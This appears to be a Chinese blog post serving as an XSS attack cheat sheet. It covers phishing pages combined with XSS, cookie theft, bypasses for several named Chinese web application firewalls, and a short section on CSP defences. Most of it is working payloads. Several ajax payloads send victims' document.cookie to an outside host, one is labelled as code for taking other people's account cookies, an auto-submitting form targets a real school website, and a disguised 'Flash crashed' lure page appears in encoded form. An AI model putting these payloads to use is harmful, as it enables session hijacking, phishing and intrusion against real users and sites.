①钓鱼页面+xss结合使用
典型
cs+xss组合拳
5种钓鱼方法
//①
<script>alert(url)</script>
//②
<script src="http://192.168.56.132/pkxss/xfish/fish.php"></script>
//③html注入钓鱼
<script>alert(<html><head><title>login</title></head><body><div style="text-align:center;"><form Method="POST" Action="phishing.php" Name="form"><br /><br />Login:<br/><input name="login" /><br />Password:<br/><input name="Password" type="password" /><br/><br/><input name="Valid" value="Ok" type="submit" /><br/></form></div></body></html>
)
</script>
//④重定向钓鱼
<script>document.location.href="http://www.baidu.com"</script>
//⑤iframe钓鱼
<iframe src="http://www.baidu.com" height="100%" width="100%"</iframe>
http://127.0.0.1/xsshack/login.php?id=<script src='http://127.0.0.1/xsshack/payload.js'></script>利用方法
钓鱼页面
扒下静态的登录页面,然后在该页面中利用from标签,将实际的登录地址更改为自己设置的后台的php文件
如
<!DOCTYPE html>
<html>
<meta charset="gbk">
<head>
<title>test </title>
</head>
<body background="kd2.jpg" style=" background-repeat:no-repeat; background-size:100% 100%; background-attachment:fixed;">
<p> </p>
#即设置界面后,进行交互控制php代
<form style="text-align:center" action="test.php" method="post">
用户: <input type="text" name="user" value="user"><br>
密码: <input type="password" name="mima" value="Mouse"><br>
<input type="submit" value="绑定">
</form>
<p style="text-align:center">点击"提交"按钮,表单数据将被发送到服务器上的“test.php”。</p>
</body>
</html>
②xss获取cookie值
利用重定向的方法获取
<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
③反射型和dom型
1.)post xss玩法
源码
<html>
<body>
<form name="form" id="form1" method="post" action="http://www.ncufz.net/gkcx/searchzj.asp">
<input type="text" name="keywords" hidden="true" value='test"><sCRiPt sRC=></sCrIpT>'/>
</form>
<script>
document.getElementById('form1').submit();
</script>
</body>
</html>
注意在name地方处改这个页面提交属性的值
在action处提交到的页面
在value处更改内容
2)dom-xss玩法
利用可给予的参数进行代攻击注入
典型与js文件连续使用形成dom-xss注入
3)flash 的钓鱼页面
var html="%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%0A%3Chead%3E%0A%3Cmeta%20charset%3D%22utf-8%22%3E%0A%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3Dedge%22%3E%0A%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2Cinitial-scale%3D1.0%22%3E%0A%3Cstyle%3E%0A%09/*%20%20%u516C%u5171%u6837%u5F0F%20%u4E0D%u662F%u5FC5%u987B*/%0A%09*%7B%0A%09%09padding%3A0%3B%0A%09%09margin%3A0%3B%0A%09%7D%0A%0A%0A%0A%0A%09/*%20%20%u5954%u6E83%u9875%u9762%u6837%u5F0F%20*/%0A%09.whole-error-container%7B%0A%09%09position%3A%20fixed%3B%0A%09%09left%3A0%3B%0A%09%09top%3A0%3B%0A%09%09width%3A100%25%3B%0A%09%09height%3A100%25%3B%0A%09%09z-index%3A%208000%3B%0A%09%09background%3A%20%237a7a7a%3B%0A%09%7D%0A%09.whole-error-content%7B%0A%09%09position%3A%20fixed%3B%0A%09%09left%3A50%25%3B%0A%09%09top%3A%2050%25%3B%0A%09%09-webkit-transform%3A%20translate%28-50%25%2C%20-50%25%29%3B%0A%09%09-ms-transform%3A%20translate%28-50%25%2C%20-50%25%29%3B%0A%09%09-moz-transform%3A%20translate%28-50%25%2C%20-50%25%29%3B%0A%09%09transform%3A%20translate%28-50%25%2C%20-50%25%29%3B%0A%09%7D%0A%09.whole-error-icon%7B%0A%09%09display%3Ablock%3B%0A%09%09margin%3A0%20auto%3B%0A%09%09width%3A48px%3B%0A%09%7D%0A%09.whole-error-info%7B%0A%09%09font-size%3A14px%3B%0A%09%09color%3A%23eee%3B%0A%09%09text-align%3A%20center%3B%0A%09%09padding-top%3A10px%3B%0A%09%7D%0A%09.whole-error-link-box%7B%0A%09%09padding-top%3A5px%3B%0A%09%09text-align%3A%20center%3B%0A%09%7D%0A%09.whole-error-link%7B%0A%09%09color%3A%23eee%3B%0A%09%09font-size%3A14px%3B%0A%09%09text-decoration%3A%20underline%3B%0A%09%7D%0A%3C/style%3E%0A%3C/head%3E%0A%0A%3Cbody%3E%0A%09%3Cdiv%20class%3D%22whole-error-container%22%3E%0A%09%09%3Cdiv%20class%3D%22whole-error-content%22%3E%0A%09%09%09%3Cimg%20class%3D%22whole-error-icon%22%20src%3D%22data%3Aimage/png%3Bbase64%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%22%20alt%3D%22%22%3E%0A%09%09%09%3Cp%20class%3D%22whole-error-info%22%3E%u63D2%u4EF6Adobe%20Flash%u5DF2%u5D29%u6E83%3C/p%3E%0A%09%09%09%3Cdiv%20class%3D%22whole-error-link-box%22%3E%0A%09%09%09%09%3Ca%20class%3D%22whole-error-link%22%20href%3D%22https://www.baidu.com%22%3E%u91CD%u65B0%u4E0B%u8F7D%3C/a%3E%0A%09%09%09%3C/div%3E%0A%09%09%3C/div%3E%0A%09%3C/div%3E%0A%3C/body%3E%0A%0A%3C/html%3E";
html=unescape(html);
document.body.innerHTML =html;
const scripts = document.body.querySelectorAll('script');
for (let script of scripts) {
runScript(script);
}
xss探针与绕过类
xss探针与不常见标签
XSS探针
'';!--"<XSS>=&{()}
不常见标签
<style onload=alert(1) />
#典型发表留言处,姓名可利用这个绕
<body onpageshow=alert(1)>
#利用body标签进行绕
<marquee behavior="alternate" onstart=alert(1)>hack the planet</marquee><marquee loop="1" onfinish=alert(1)>hack the planet</marquee><marquee onstart=alert(1)>hack the planet</marquee>
#Marquee 标签
#on事件 h1标签
如
<h1 onmousemove="alert('moved!')">this is a title</h1>
#link标签
<link rel="import" href="">
<link rel="prefetch" href="">#h5预加载,仅google chrome支持
<link rel="dns-prefetch" href="">#DNS预加载
#html5特性的xss
<input onfocus=write(1) autofocus>
<input onblur=write(1) autofocus><input autofocus>
绕黑名单代码样式
原因:JavaScript代码同义的各种动作都会被目标防护软件列入黑名单,甚至是使用正常的alert也不例外
输出点类
#直接输出在标签属性中,onerror即为标签属性
<img src=x onerror="" />
#输出在javascript变量中
如#在这里name即为一个javascript标签
http://127.0.0.1/?name=\
防止方法
csp内容安全策略
配置方法
CSP内容匹配的规则:规则名称 规则 规则;规则名称 规则 ...
script-src常见的关键字
none:禁止加载所有
self:允许加载同源的资源文件
unsafe-inline:允许页面直接执行嵌入的javascript代码
unsafe-eval:允许使用eval()等通过字符串创建代码的方法
比如:
default-src 'none'; script-src 'self'; connect-src 'self'; img-src 'self'; style-src 'self';
default-src 'self' *.xx.com *.xx.cn aa.com 'unsafe-inline' 'unsafe-eval'
两种类型
①使用meta标签, 直接在页面添加meta标签
<meta http-equiv="Content-Security-Policy" content="default-src 'self' *.xx.com *.xx.cn 'unsafe-inline' 'unsafe-eval';">
②服务端配置csp
配置方法
如
#Apache :
Add the following to your httpd.conf in your VirtualHost or in an .htaccess file:
Header set Content-Security-Policy "default-src 'self';"
#Nginx :
In your server {} block add:
add_header Content-Security-Policy "default-src 'self';";
详细规则
| 指令 | 说明 |
|---|---|
| default-src | 定义资源的默认加载策略 |
| script-src | 定义js加载策略 |
| style-src | 定义css加载策略 |
| img-src | 定义图片加载策略 |
| media-src | 定义等引用资源的加载策略 |
| connect-src | 定义ajax的加载策略 |
| font-src | 定义font的加载策略 |
| object-src | 定义等引用资源的加载策略 |
| frame-src | 定价frame加载策略 |
| report-uri | 若提交/report-uri,则提交日志 |
绕过
单个绕过
①伪协议
<a href="javascript:alert(1)">1</a>
<iframe src="javascript:alert(1)">
#form标签需要提交表单时才可利用
<form action="javascript:alert(1)"></from>
②编码绕
常见的编码绕
①实体编码
②hex编码
③base64编码
④utf-8编码
③不闭合绕
即闭合类如果被屏蔽掉–>可以考虑利用非闭合进行绕
<script>alert(1)</script
#如构造
④规定资源绕
比如某网站前端加载了1.js 文件
原理:上面代码导致可加载网站中的js
所以上面加载的js就会加载www.test.com的js
所以实战就很简单 我们用自己的网站 上面放个1.js文件
里面内容为alert(1)
即可成功构造加载出
⑤进制绕
用 \u003c 来代替<
<类符号被过滤了 可以转实体编码进行绕
\u003e换成原来的>
<img src=1 onerr\or=alert(1)>
#如果< >没被过滤
#可以利用onload onmouvesemove引入标签中
当alert这些被过滤时可以绕的思路
组合绕过
①加编码括号+变单引号进行绕过
<svg onload> 拦截
<svg > onload>不拦截
因此可以构建
<svg %26%2362 onload=alert`1`>#即进行编码>进行绕过
常用的三种绕厂商的
#云锁与百度云加速
<svg %26%2362 onload=alert`1`>
奇安信
<select autofocus onfocus=[2].find(alert)>
安全狗
<img src=# οnerrοr=alert`2`>
<input onfocus="document.body.appendChild(createElement('script')).src='//xss.xx/B6Bb'" autofocus>
绕的nice
实例分析
#1.)无任何过滤-->直接代">闭合<a></a>标签
2.)过滤掉了<script>等符号时,但“没过滤
直接在<a>标签中加入东西,实现逃逸
#如
" οnclick="alert(1)
3.)突破xss中的长度限制
突破方法1-->利用eval函数-->原因:它可以执行js代码
#" οnclick="eval(location.href.substr(80))"+url中输入路径代码
#前一个的作用-->获取url的第80个字符以后的文本,也就是我们的payload, 如果payload很长这个方法可以缩减字符!
突破方法2-->
利用js已经允许的执行函数+eval执行共同形成
如
#url="οnclick="eval(getParam(1))"&1=%24.ajax(%7Burl%3A'https%3A%2F%2Ftofu.exeye.run%2Flimit_check'%2Ctype%3A'post'%2Cdata%3A%7Bcookie%3Adocument.cookie%7D%2Csuccess%3Afunction(res)%7Balert(res)%7D%7D)
#即可获得cookie值,成功绕过长度限制
4.)拼接绕类
适用于:当关键字被过滤返回为空字符类情况-->即说明有关键字转义
所以可以构造关键字绕+当如果字符被转义,可尝试是一个字符被转义,还是所以都被转义了
#"" οnclick="alert(1)"绕不过的
#"" onclonclickick="alert(1)"可绕过的
第二类型打包href标签的属性,从而绕xss类
第三类型–>被限制长度类
第四类型
获取别人账号cookie的代码
"" onclonclickick="$.ajax({url:`https://tofu.exeye.run/commit/check`,type:`post`,data:{cookie:document.cookie,xsser:`你自己的账户号码`}})"
代命令执行的xss
< img src=x onerror="const exec = require('child_process').exec;exec('whoami').stdout.on('data', function (data) {alert(data);})">
挖掘思路
挖掘点–>插入根据标签代
二种大类型输出方式-->html与css中
标签中-->属性中-->事件中-->css中
在html标签中输出
<div>$var</div><a href=# >$var</a>
html属性中
<div id=“abc” name="$var" ></div>
事件中输出
<a href=# οnclick=“funcA(’$var’)” >test</a>
css中输出
<style type="text/css">
body {background-image:url(${xss});}
body {background-image:expression(${xss});}
</style>
js
<script>var x = “$var”;</script>
修复方案
①对于输出类似于是在js里面的话,过滤<>/-->第一种,后面的两种可以用&,#这三个符号进行替换
1.<script>[输出]</script>#特殊技巧 ①利用qq的宽字节注入进行代,即根据服务器本身的gbk编码进行代②利用\或者/符号进行绕
2.<HTML 标签 onXXXX="...[输出在这里].."> #后面两种也是属于标签输出的
3.<a href="javascript:[输出在这里]">xxxx </a>
等价符号&,#就三类就好了-->即不让他闭合,进而逃逸不出
②输出在html属性里面的情况-->通用过滤方法-->过滤" 进而造成属性的事件逃逸,如如下
乌云欢迎您" onclick="alert(1)
<input type="text" value="乌云欢迎您" οnclick="alert(1)" />
专用的过滤方法-->过滤\-->适用于输出点在css里面的情况
原因:css允许使用转义字符,因此\+ascii16进制即可实现一个完整的攻击
<body style="overflow:auto;background-color: 即body style的这种情况
③
根据标签想办法溢出-->②进行fuzz看那些没标签和属性没被ban-->③根据fuzz的标签和属性进行构造一个完整的
典型可测试的语句思路
<img src=1>看看是否可解析,即看是否有图片页面
然后在去尝试绕过
持久化xss
原理:即通过劫持组合起来打xss
三种方法:
①opener hijack 开放式劫持
②link hijack 链接劫持
③HTTP cache hijack-->http缓存劫持-->原理:通过Service Workers全局请求拦截技术-->即通过js代码拦截浏览器当前域http请求,并设置直接返回缓存文件。
722
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
